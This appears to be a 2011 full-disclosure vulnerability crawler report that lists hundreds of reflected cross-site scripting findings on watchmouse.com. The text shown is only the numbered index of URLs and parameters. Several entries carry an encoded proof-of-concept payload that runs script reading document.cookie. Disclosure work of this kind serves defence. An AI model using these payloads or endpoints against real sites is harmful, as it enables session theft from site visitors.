Current Research | Full Disclosure | As of March 14, 2011

Cross Site Scripting, XSS, CWE-79, CAPEC-86, watchmouse.com

XSS in watchmouse.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Wed Feb 09 06:11:52 CST 2011.



DORK CWE-79 XSS Report

1. Cross-site scripting (reflected)

1.1. http://www.watchmouse.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.watchmouse.com/assets/css/chat.css [REST URL parameter 1]

1.3. http://www.watchmouse.com/assets/css/chat.css [REST URL parameter 2]

1.4. http://www.watchmouse.com/assets/css/chat.css [REST URL parameter 3]

1.5. http://www.watchmouse.com/assets/css/fancybox.css [REST URL parameter 1]

1.6. http://www.watchmouse.com/assets/css/fancybox.css [REST URL parameter 2]

1.7. http://www.watchmouse.com/assets/css/fancybox.css [REST URL parameter 3]

1.8. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 1]

1.9. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 2]

1.10. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]

1.11. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 1]

1.12. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 2]

1.13. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]

1.14. http://www.watchmouse.com/assets/css/ui.smoothness.css [REST URL parameter 1]

1.15. http://www.watchmouse.com/assets/css/ui.smoothness.css [REST URL parameter 2]

1.16. http://www.watchmouse.com/assets/css/ui.smoothness.css [REST URL parameter 3]

1.17. http://www.watchmouse.com/assets/docs/WatchMouse_Product_Features.pdf [REST URL parameter 1]

1.18. http://www.watchmouse.com/assets/docs/WatchMouse_Product_Features.pdf [REST URL parameter 2]

1.19. http://www.watchmouse.com/assets/docs/WatchMouse_Product_Features.pdf [REST URL parameter 3]

1.20. http://www.watchmouse.com/assets/docs/WatchMouse_Scripting_Howto.pdf [REST URL parameter 1]

1.21. http://www.watchmouse.com/assets/docs/WatchMouse_Scripting_Howto.pdf [REST URL parameter 2]

1.22. http://www.watchmouse.com/assets/docs/WatchMouse_Scripting_Howto.pdf [REST URL parameter 3]

1.23. http://www.watchmouse.com/assets/img/favicon.ico [REST URL parameter 1]

1.24. http://www.watchmouse.com/assets/img/favicon.ico [REST URL parameter 2]

1.25. http://www.watchmouse.com/assets/img/favicon.ico [REST URL parameter 3]

1.26. http://www.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 1]

1.27. http://www.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 2]

1.28. http://www.watchmouse.com/assets/js/easySlider1.7.packed.js [REST URL parameter 3]

1.29. http://www.watchmouse.com/assets/js/fancybox.js [REST URL parameter 1]

1.30. http://www.watchmouse.com/assets/js/fancybox.js [REST URL parameter 2]

1.31. http://www.watchmouse.com/assets/js/fancybox.js [REST URL parameter 3]

1.32. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 1]

1.33. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 2]

1.34. http://www.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 3]

1.35. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 1]

1.36. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 2]

1.37. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 3]

1.38. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 1]

1.39. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 2]

1.40. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 3]

1.41. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 4]

1.42. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 1]

1.43. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 2]

1.44. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 3]

1.45. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 4]

1.46. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 1]

1.47. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 2]

1.48. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 3]

1.49. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 4]

1.50. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 1]

1.51. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 2]

1.52. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 3]

1.53. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 1]

1.54. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 2]

1.55. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 3]

1.56. http://www.watchmouse.com/chat.php [REST URL parameter 1]

1.57. http://www.watchmouse.com/de/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.58. http://www.watchmouse.com/de/ [REST URL parameter 1]

1.59. http://www.watchmouse.com/de/ [name of an arbitrarily supplied request parameter]

1.60. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 1]

1.61. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 2]

1.62. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 3]

1.63. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.64. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.65. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.66. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.67. http://www.watchmouse.com/de/learn_more.php [REST URL parameter 1]

1.68. http://www.watchmouse.com/de/learn_more.php [REST URL parameter 2]

1.69. http://www.watchmouse.com/de/learn_more.php [name of an arbitrarily supplied request parameter]

1.70. http://www.watchmouse.com/de/plans_price.php [REST URL parameter 1]

1.71. http://www.watchmouse.com/de/plans_price.php [REST URL parameter 2]

1.72. http://www.watchmouse.com/de/plans_price.php [name of an arbitrarily supplied request parameter]

1.73. http://www.watchmouse.com/de/register.php [REST URL parameter 1]

1.74. http://www.watchmouse.com/de/register.php [REST URL parameter 2]

1.75. http://www.watchmouse.com/de/register.php [name of an arbitrarily supplied request parameter]

1.76. http://www.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.77. http://www.watchmouse.com/en/ [REST URL parameter 1]

1.78. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

1.79. http://www.watchmouse.com/en/about.php [REST URL parameter 1]

1.80. http://www.watchmouse.com/en/about.php [REST URL parameter 2]

1.81. http://www.watchmouse.com/en/about.php [name of an arbitrarily supplied request parameter]

1.82. http://www.watchmouse.com/en/awards.php [REST URL parameter 1]

1.83. http://www.watchmouse.com/en/awards.php [REST URL parameter 2]

1.84. http://www.watchmouse.com/en/awards.php [name of an arbitrarily supplied request parameter]

1.85. http://www.watchmouse.com/en/chat.php [REST URL parameter 1]

1.86. http://www.watchmouse.com/en/chat.php [REST URL parameter 2]

1.87. http://www.watchmouse.com/en/checkit.php [REST URL parameter 1]

1.88. http://www.watchmouse.com/en/checkit.php [REST URL parameter 2]

1.89. http://www.watchmouse.com/en/checkit.php [name of an arbitrarily supplied request parameter]

1.90. http://www.watchmouse.com/en/compare_plans.php [REST URL parameter 1]

1.91. http://www.watchmouse.com/en/compare_plans.php [REST URL parameter 2]

1.92. http://www.watchmouse.com/en/compare_plans.php [name of an arbitrarily supplied request parameter]

1.93. http://www.watchmouse.com/en/compare_plans.php [vpackid parameter]

1.94. http://www.watchmouse.com/en/contact.php [REST URL parameter 1]

1.95. http://www.watchmouse.com/en/contact.php [REST URL parameter 2]

1.96. http://www.watchmouse.com/en/contact.php [name of an arbitrarily supplied request parameter]

1.97. http://www.watchmouse.com/en/current_partners.php [REST URL parameter 1]

1.98. http://www.watchmouse.com/en/current_partners.php [REST URL parameter 2]

1.99. http://www.watchmouse.com/en/current_partners.php [name of an arbitrarily supplied request parameter]

1.100. http://www.watchmouse.com/en/customers.php [REST URL parameter 1]

1.101. http://www.watchmouse.com/en/customers.php [REST URL parameter 2]

1.102. http://www.watchmouse.com/en/customers.php [name of an arbitrarily supplied request parameter]

1.103. http://www.watchmouse.com/en/dnstool.php [REST URL parameter 1]

1.104. http://www.watchmouse.com/en/dnstool.php [REST URL parameter 2]

1.105. http://www.watchmouse.com/en/dnstool.php [name of an arbitrarily supplied request parameter]

1.106. http://www.watchmouse.com/en/extensions.php [REST URL parameter 1]

1.107. http://www.watchmouse.com/en/extensions.php [REST URL parameter 2]

1.108. http://www.watchmouse.com/en/extensions.php [name of an arbitrarily supplied request parameter]

1.109. http://www.watchmouse.com/en/fact_sheet.php [REST URL parameter 1]

1.110. http://www.watchmouse.com/en/fact_sheet.php [REST URL parameter 2]

1.111. http://www.watchmouse.com/en/fact_sheet.php [name of an arbitrarily supplied request parameter]

1.112. http://www.watchmouse.com/en/faq.php [REST URL parameter 1]

1.113. http://www.watchmouse.com/en/faq.php [REST URL parameter 2]

1.114. http://www.watchmouse.com/en/faq.php [name of an arbitrarily supplied request parameter]

1.115. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 1]

1.116. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 2]

1.117. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 3]

1.118. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [name of an arbitrarily supplied request parameter]

1.119. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 1]

1.120. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 2]

1.121. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 3]

1.122. http://www.watchmouse.com/en/feature/compare_plans.php [name of an arbitrarily supplied request parameter]

1.123. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 1]

1.124. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 2]

1.125. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 3]

1.126. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [name of an arbitrarily supplied request parameter]

1.127. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 1]

1.128. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 2]

1.129. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 3]

1.130. http://www.watchmouse.com/en/feature/privacy.php [name of an arbitrarily supplied request parameter]

1.131. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 1]

1.132. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 2]

1.133. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 3]

1.134. http://www.watchmouse.com/en/feature/public-status-page.html [name of an arbitrarily supplied request parameter]

1.135. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 1]

1.136. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 2]

1.137. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 3]

1.138. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [name of an arbitrarily supplied request parameter]

1.139. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 1]

1.140. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 2]

1.141. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 3]

1.142. http://www.watchmouse.com/en/feature/root-cause-analysis.html [name of an arbitrarily supplied request parameter]

1.143. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 1]

1.144. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 2]

1.145. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 3]

1.146. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [name of an arbitrarily supplied request parameter]

1.147. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 1]

1.148. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 2]

1.149. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 3]

1.150. http://www.watchmouse.com/en/feature/tos.php [name of an arbitrarily supplied request parameter]

1.151. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.152. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.153. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.154. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.155. http://www.watchmouse.com/en/feed.php [REST URL parameter 1]

1.156. http://www.watchmouse.com/en/feed.php [REST URL parameter 2]

1.157. http://www.watchmouse.com/en/feed.php [name of an arbitrarily supplied request parameter]

1.158. http://www.watchmouse.com/en/free_resources.php [REST URL parameter 1]

1.159. http://www.watchmouse.com/en/free_resources.php [REST URL parameter 2]

1.160. http://www.watchmouse.com/en/free_resources.php [name of an arbitrarily supplied request parameter]

1.161. http://www.watchmouse.com/en/howto.php [REST URL parameter 1]

1.162. http://www.watchmouse.com/en/howto.php [REST URL parameter 2]

1.163. http://www.watchmouse.com/en/howto.php [name of an arbitrarily supplied request parameter]

1.164. http://www.watchmouse.com/en/inthenews.php [REST URL parameter 1]

1.165. http://www.watchmouse.com/en/inthenews.php [REST URL parameter 2]

1.166. http://www.watchmouse.com/en/inthenews.php [name of an arbitrarily supplied request parameter]

1.167. http://www.watchmouse.com/en/learn_more.php [REST URL parameter 1]

1.168. http://www.watchmouse.com/en/learn_more.php [REST URL parameter 2]

1.169. http://www.watchmouse.com/en/learn_more.php [name of an arbitrarily supplied request parameter]

1.170. http://www.watchmouse.com/en/management.php [REST URL parameter 1]

1.171. http://www.watchmouse.com/en/management.php [REST URL parameter 2]

1.172. http://www.watchmouse.com/en/management.php [name of an arbitrarily supplied request parameter]

1.173. http://www.watchmouse.com/en/media_contact.php [REST URL parameter 1]

1.174. http://www.watchmouse.com/en/media_contact.php [REST URL parameter 2]

1.175. http://www.watchmouse.com/en/media_contact.php [name of an arbitrarily supplied request parameter]

1.176. http://www.watchmouse.com/en/my_subscription.php [REST URL parameter 1]

1.177. http://www.watchmouse.com/en/my_subscription.php [REST URL parameter 2]

1.178. http://www.watchmouse.com/en/my_subscription.php [name of an arbitrarily supplied request parameter]

1.179. http://www.watchmouse.com/en/my_subscription.php [vpackid parameter]

1.180. http://www.watchmouse.com/en/newsletters.php [REST URL parameter 1]

1.181. http://www.watchmouse.com/en/newsletters.php [REST URL parameter 2]

1.182. http://www.watchmouse.com/en/newsletters.php [name of an arbitrarily supplied request parameter]

1.183. http://www.watchmouse.com/en/non_profit_offering.php [REST URL parameter 1]

1.184. http://www.watchmouse.com/en/non_profit_offering.php [REST URL parameter 2]

1.185. http://www.watchmouse.com/en/non_profit_offering.php [name of an arbitrarily supplied request parameter]

1.186. http://www.watchmouse.com/en/our_promise.php [REST URL parameter 1]

1.187. http://www.watchmouse.com/en/our_promise.php [REST URL parameter 2]

1.188. http://www.watchmouse.com/en/our_promise.php [name of an arbitrarily supplied request parameter]

1.189. http://www.watchmouse.com/en/passwd.php [REST URL parameter 1]

1.190. http://www.watchmouse.com/en/passwd.php [REST URL parameter 2]

1.191. http://www.watchmouse.com/en/ping.php [REST URL parameter 1]

1.192. http://www.watchmouse.com/en/ping.php [REST URL parameter 2]

1.193. http://www.watchmouse.com/en/ping.php [name of an arbitrarily supplied request parameter]

1.194. http://www.watchmouse.com/en/plans_price.php [REST URL parameter 1]

1.195. http://www.watchmouse.com/en/plans_price.php [REST URL parameter 2]

1.196. http://www.watchmouse.com/en/plans_price.php [name of an arbitrarily supplied request parameter]

1.197. http://www.watchmouse.com/en/press.php [REST URL parameter 1]

1.198. http://www.watchmouse.com/en/press.php [REST URL parameter 2]

1.199. http://www.watchmouse.com/en/press.php [name of an arbitrarily supplied request parameter]

1.200. http://www.watchmouse.com/en/privacy.php [REST URL parameter 1]

1.201. http://www.watchmouse.com/en/privacy.php [REST URL parameter 2]

1.202. http://www.watchmouse.com/en/privacy.php [name of an arbitrarily supplied request parameter]

1.203. http://www.watchmouse.com/en/register.php [REST URL parameter 1]

1.204. http://www.watchmouse.com/en/register.php [REST URL parameter 2]

1.205. http://www.watchmouse.com/en/register.php [name of an arbitrarily supplied request parameter]

1.206. http://www.watchmouse.com/en/releases.php [REST URL parameter 1]

1.207. http://www.watchmouse.com/en/releases.php [REST URL parameter 2]

1.208. http://www.watchmouse.com/en/releases.php [name of an arbitrarily supplied request parameter]

1.209. http://www.watchmouse.com/en/resellers.php [REST URL parameter 1]

1.210. http://www.watchmouse.com/en/resellers.php [REST URL parameter 2]

1.211. http://www.watchmouse.com/en/resellers.php [name of an arbitrarily supplied request parameter]

1.212. http://www.watchmouse.com/en/scripting.php [REST URL parameter 1]

1.213. http://www.watchmouse.com/en/scripting.php [REST URL parameter 2]

1.214. http://www.watchmouse.com/en/search.php [REST URL parameter 1]

1.215. http://www.watchmouse.com/en/search.php [REST URL parameter 2]

1.216. http://www.watchmouse.com/en/search.php [name of an arbitrarily supplied request parameter]

1.217. http://www.watchmouse.com/en/security_news.php [REST URL parameter 1]

1.218. http://www.watchmouse.com/en/security_news.php [REST URL parameter 2]

1.219. http://www.watchmouse.com/en/security_news.php [name of an arbitrarily supplied request parameter]

1.220. http://www.watchmouse.com/en/sitemap.php [REST URL parameter 1]

1.221. http://www.watchmouse.com/en/sitemap.php [REST URL parameter 2]

1.222. http://www.watchmouse.com/en/sitemap.php [name of an arbitrarily supplied request parameter]

1.223. http://www.watchmouse.com/en/terms.php [REST URL parameter 1]

1.224. http://www.watchmouse.com/en/terms.php [REST URL parameter 2]

1.225. http://www.watchmouse.com/en/terms.php [name of an arbitrarily supplied request parameter]

1.226. http://www.watchmouse.com/en/tos.php [REST URL parameter 1]

1.227. http://www.watchmouse.com/en/tos.php [REST URL parameter 2]

1.228. http://www.watchmouse.com/en/tos.php [name of an arbitrarily supplied request parameter]

1.229. http://www.watchmouse.com/en/traceroute.php [REST URL parameter 1]

1.230. http://www.watchmouse.com/en/traceroute.php [REST URL parameter 2]

1.231. http://www.watchmouse.com/en/traceroute.php [name of an arbitrarily supplied request parameter]

1.232. http://www.watchmouse.com/en/trial.php [REST URL parameter 1]

1.233. http://www.watchmouse.com/en/trial.php [REST URL parameter 2]

1.234. http://www.watchmouse.com/en/trial.php [name of an arbitrarily supplied request parameter]

1.235. http://www.watchmouse.com/en/website_monitoring_features.php [REST URL parameter 1]

1.236. http://www.watchmouse.com/en/website_monitoring_features.php [REST URL parameter 2]

1.237. http://www.watchmouse.com/en/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.238. http://www.watchmouse.com/en/worldwide.php [REST URL parameter 1]

1.239. http://www.watchmouse.com/en/worldwide.php [REST URL parameter 2]

1.240. http://www.watchmouse.com/en/worldwide.php [name of an arbitrarily supplied request parameter]

1.241. http://www.watchmouse.com/es/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.242. http://www.watchmouse.com/es/ [REST URL parameter 1]

1.243. http://www.watchmouse.com/es/ [name of an arbitrarily supplied request parameter]

1.244. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 1]

1.245. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 2]

1.246. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 3]

1.247. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.248. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.249. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.250. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.251. http://www.watchmouse.com/es/learn_more.php [REST URL parameter 1]

1.252. http://www.watchmouse.com/es/learn_more.php [REST URL parameter 2]

1.253. http://www.watchmouse.com/es/learn_more.php [name of an arbitrarily supplied request parameter]

1.254. http://www.watchmouse.com/es/plans_price.php [REST URL parameter 1]

1.255. http://www.watchmouse.com/es/plans_price.php [REST URL parameter 2]

1.256. http://www.watchmouse.com/es/plans_price.php [name of an arbitrarily supplied request parameter]

1.257. http://www.watchmouse.com/es/register.php [REST URL parameter 1]

1.258. http://www.watchmouse.com/es/register.php [REST URL parameter 2]

1.259. http://www.watchmouse.com/es/register.php [name of an arbitrarily supplied request parameter]

1.260. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.261. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.262. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.263. http://www.watchmouse.com/feed.php [REST URL parameter 1]

1.264. http://www.watchmouse.com/feed.php [name of an arbitrarily supplied request parameter]

1.265. http://www.watchmouse.com/fr/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.266. http://www.watchmouse.com/fr/ [REST URL parameter 1]

1.267. http://www.watchmouse.com/fr/ [name of an arbitrarily supplied request parameter]

1.268. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 1]

1.269. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 2]

1.270. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 3]

1.271. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.272. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.273. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.274. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.275. http://www.watchmouse.com/fr/learn_more.php [REST URL parameter 1]

1.276. http://www.watchmouse.com/fr/learn_more.php [REST URL parameter 2]

1.277. http://www.watchmouse.com/fr/learn_more.php [name of an arbitrarily supplied request parameter]

1.278. http://www.watchmouse.com/fr/plans_price.php [REST URL parameter 1]

1.279. http://www.watchmouse.com/fr/plans_price.php [REST URL parameter 2]

1.280. http://www.watchmouse.com/fr/plans_price.php [name of an arbitrarily supplied request parameter]

1.281. http://www.watchmouse.com/fr/register.php [REST URL parameter 1]

1.282. http://www.watchmouse.com/fr/register.php [REST URL parameter 2]

1.283. http://www.watchmouse.com/fr/register.php [name of an arbitrarily supplied request parameter]

1.284. http://www.watchmouse.com/it/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.285. http://www.watchmouse.com/it/ [REST URL parameter 1]

1.286. http://www.watchmouse.com/it/ [name of an arbitrarily supplied request parameter]

1.287. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 1]

1.288. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 2]

1.289. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 3]

1.290. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.291. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.292. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.293. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.294. http://www.watchmouse.com/it/learn_more.php [REST URL parameter 1]

1.295. http://www.watchmouse.com/it/learn_more.php [REST URL parameter 2]

1.296. http://www.watchmouse.com/it/learn_more.php [name of an arbitrarily supplied request parameter]

1.297. http://www.watchmouse.com/it/plans_price.php [REST URL parameter 1]

1.298. http://www.watchmouse.com/it/plans_price.php [REST URL parameter 2]

1.299. http://www.watchmouse.com/it/plans_price.php [name of an arbitrarily supplied request parameter]

1.300. http://www.watchmouse.com/it/register.php [REST URL parameter 1]

1.301. http://www.watchmouse.com/it/register.php [REST URL parameter 2]

1.302. http://www.watchmouse.com/it/register.php [name of an arbitrarily supplied request parameter]

1.303. http://www.watchmouse.com/nl/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.304. http://www.watchmouse.com/nl/ [REST URL parameter 1]

1.305. http://www.watchmouse.com/nl/ [name of an arbitrarily supplied request parameter]

1.306. http://www.watchmouse.com/nl/feature/public-status-page.html [REST URL parameter 1]

1.307. http://www.watchmouse.com/nl/feature/public-status-page.html [REST URL parameter 2]

1.308. http://www.watchmouse.com/nl/feature/public-status-page.html [REST URL parameter 3]

1.309. http://www.watchmouse.com/nl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.310. http://www.watchmouse.com/nl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.311. http://www.watchmouse.com/nl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.312. http://www.watchmouse.com/nl/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.313. http://www.watchmouse.com/nl/learn_more.php [REST URL parameter 1]

1.314. http://www.watchmouse.com/nl/learn_more.php [REST URL parameter 2]

1.315. http://www.watchmouse.com/nl/learn_more.php [name of an arbitrarily supplied request parameter]

1.316. http://www.watchmouse.com/nl/plans_price.php [REST URL parameter 1]

1.317. http://www.watchmouse.com/nl/plans_price.php [REST URL parameter 2]

1.318. http://www.watchmouse.com/nl/plans_price.php [name of an arbitrarily supplied request parameter]

1.319. http://www.watchmouse.com/nl/register.php [REST URL parameter 1]

1.320. http://www.watchmouse.com/nl/register.php [REST URL parameter 2]

1.321. http://www.watchmouse.com/nl/register.php [name of an arbitrarily supplied request parameter]

1.322. http://www.watchmouse.com/passwd.php [REST URL parameter 1]

1.323. http://www.watchmouse.com/passwd.php [name of an arbitrarily supplied request parameter]

1.324. http://www.watchmouse.com/pl/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.325. http://www.watchmouse.com/pl/ [REST URL parameter 1]

1.326. http://www.watchmouse.com/pl/ [name of an arbitrarily supplied request parameter]

1.327. http://www.watchmouse.com/pl/feature/public-status-page.html [REST URL parameter 1]

1.328. http://www.watchmouse.com/pl/feature/public-status-page.html [REST URL parameter 2]

1.329. http://www.watchmouse.com/pl/feature/public-status-page.html [REST URL parameter 3]

1.330. http://www.watchmouse.com/pl/feature/public-status-page.html [name of an arbitrarily supplied request parameter]

1.331. http://www.watchmouse.com/pl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.332. http://www.watchmouse.com/pl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.333. http://www.watchmouse.com/pl/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.334. http://www.watchmouse.com/pl/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.335. http://www.watchmouse.com/pl/learn_more.php [REST URL parameter 1]

1.336. http://www.watchmouse.com/pl/learn_more.php [REST URL parameter 2]

1.337. http://www.watchmouse.com/pl/learn_more.php [name of an arbitrarily supplied request parameter]

1.338. http://www.watchmouse.com/pl/plans_price.php [REST URL parameter 1]

1.339. http://www.watchmouse.com/pl/plans_price.php [REST URL parameter 2]

1.340. http://www.watchmouse.com/pl/plans_price.php [name of an arbitrarily supplied request parameter]

1.341. http://www.watchmouse.com/pl/register.php [REST URL parameter 1]

1.342. http://www.watchmouse.com/pl/register.php [REST URL parameter 2]

1.343. http://www.watchmouse.com/pl/register.php [name of an arbitrarily supplied request parameter]

1.344. http://www.watchmouse.com/profile.php [REST URL parameter 1]

1.345. http://www.watchmouse.com/profile.php [name of an arbitrarily supplied request parameter]

1.346. http://www.watchmouse.com/pt/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.347. http://www.watchmouse.com/pt/ [REST URL parameter 1]

1.348. http://www.watchmouse.com/pt/ [name of an arbitrarily supplied request parameter]

1.349. http://www.watchmouse.com/pt/feature/public-status-page.html [REST URL parameter 1]

1.350. http://www.watchmouse.com/pt/feature/public-status-page.html [REST URL parameter 2]

1.351. http://www.watchmouse.com/pt/feature/public-status-page.html [REST URL parameter 3]

1.352. http://www.watchmouse.com/pt/feature/public-status-page.html [name of an arbitrarily supplied request parameter]

1.353. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.354. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.355. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.356. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.357. http://www.watchmouse.com/pt/learn_more.php [REST URL parameter 1]

1.358. http://www.watchmouse.com/pt/learn_more.php [REST URL parameter 2]

1.359. http://www.watchmouse.com/pt/learn_more.php [name of an arbitrarily supplied request parameter]

1.360. http://www.watchmouse.com/pt/plans_price.php [REST URL parameter 1]

1.361. http://www.watchmouse.com/pt/plans_price.php [REST URL parameter 2]

